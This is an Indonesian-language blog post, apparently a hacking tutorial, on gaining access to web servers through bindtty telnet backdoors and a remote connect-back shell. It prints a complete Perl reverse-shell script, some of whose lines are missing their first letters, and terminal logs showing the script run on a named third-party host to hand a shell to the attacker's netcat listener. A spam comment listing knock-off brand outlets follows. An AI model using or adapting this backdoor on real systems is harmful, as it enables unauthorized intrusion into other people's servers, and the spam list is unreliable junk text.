.
Ok sekarang kita langsung aja ke permasalahanya.Seperti biasa aku cari2 web yg bisa dideface dengan
menggunakan php injection.Artikel php injection akan dibahas selanjutnya sekarang aku akan coba dengan Remote BS.
Sekarang kita liat cara kerja dari semua backdoor telnet seperti bindtty :
- Membuka port xxxx dgn service telnet
- Tipe A<----B
Artinya A sebagai target dan di pasang backdoor dan di A di buka
port xxxx
Apabila A tidak di belakang firewall maka backdoor bindtty kita bisa
diaccess.
contoh :
[the_day@mysarah sploit]$ telnet 210.50.2.218 6655
Trying 210.50.2.218...
Connected to 210.50.2.218.
Escape character is '^]'.
passwd xxxxx
=- SecretColony Lab N Research Project Modified by K-159 -=
sh-2.05b$
sh-2.05b$
Diatas cara mengakses backdoor telnet menggunakan bindtty.
Bagaimana dengan Teknik Remote Backshell
- Tipe A--->B
artinya target kita konekkan ke ip kita dan di ip kita dibuat listen pd port xxx
- Kita menjalankan sebuah program connect.pl di target script connect.pl
---------------------------------------------------------------------------------
#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl
# The supplied exploit code is not to be used for malicious purpose, but for educational purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything happened by the couse of using all information on these website.
use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security Team (1st)\n\n";
$cmd= "lpd";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
cket(SOCKET, P_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
nnect(SOCKET, $paddr) || die("Error: $!\n");
en(STDIN, ">&SOCKET");
en(STDOUT, ">&SOCKET");
en(STDERR, ">&SOCKET");
int STDOUT $pamer;
stem($system);
ose(STDIN);
ose(STDOUT);
ose(STDERR);
---------------------------------------------------------------------------------------------EOF
- Ingat kamu bisa kembangkan cara sendiri untuk menaruh file connect.pl di di folder cgi-bin
- Jangan lupa di chmod 755 connect.pl
- Cara menjalankannya pertama kita buka shell kita dan pakai nc untuk listen dan buka port
Disini saya memakai shell lain yg menggunakan ip public.
[the_day@mysarah sploit]$ ssh 210.50.2.218 -l root -p 38
root@210.50.2.218's password:
Warning: Remote host denied X11 forwarding.
Last login: Wed Mar 10 16:10:21 2004 from 203-219-57-90-vic.tpgi.com.au
You have new mail.
[root@dellserver root]# nc -l -p 5000
sebelum ada koneksi
- Disini A mempunyai Ip :209.150.128.163
B mempunyai Ip :210.50.2.218 dan listen di port 5000
- Jadi kita gunakan command menggunakan file connect.pl tadi menjadi
perl conect.pl 210.50.2.218 5000
Command exceeded maximum time of 10 second(s).
Killed it!
- Setelah terjadi hubungan A---->B[5000]
[root@dellserver root]# nc -l -p 5000
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)
Linux griffin.host4u.net 2.2.26-rpd #5 SMP Wed Apr 28 17:36:44 CDT 2004 i686 unknown
uid=804(homeandbiz) gid=790(homeandbizgrp) groups=790(homeandbizgrp)
- Yup kita sudah masuk melalui remote backshell,sekarang tinggal terserah kalian.
- http://www.homeandbiz.com/log.html
Teknik Remote Connect-Back Shell
Langganan:
Posting Komentar
(
Atom
)
1 komentar :
15.07.16daigege
ray ban glasses
hollister clothing
oakley sunglasses outlet
nike tn pas cher
kate spade uk
true religion jeans
cheap oakleys
michael kors handbag
ed hardy clothing
nike tn
toms shoes outlet
snapback hats wholesale
ralph lauren uk
tory burch shoes
soccer jerseys
burberry outlet online
coach outlet online
replica watches
michael kors uk
pandora jewelry
toms outlet
gucci outlet
oakley sunglasses discount
kate spade bags
coach outlet
ray bans
ralph lauren
jordan pas cher
chaussure louboutin
air max 90
christian louboutin outlet
coach outlet online
michael kors bag
oakley sunglasses wholesale
fitflops outlet
mcm outlet
oakley sunglasses outlet
coach factory outlet
burberry outlet
chanel online shop
Posting Komentar
Silahkan tinggalkan komentar anda disini...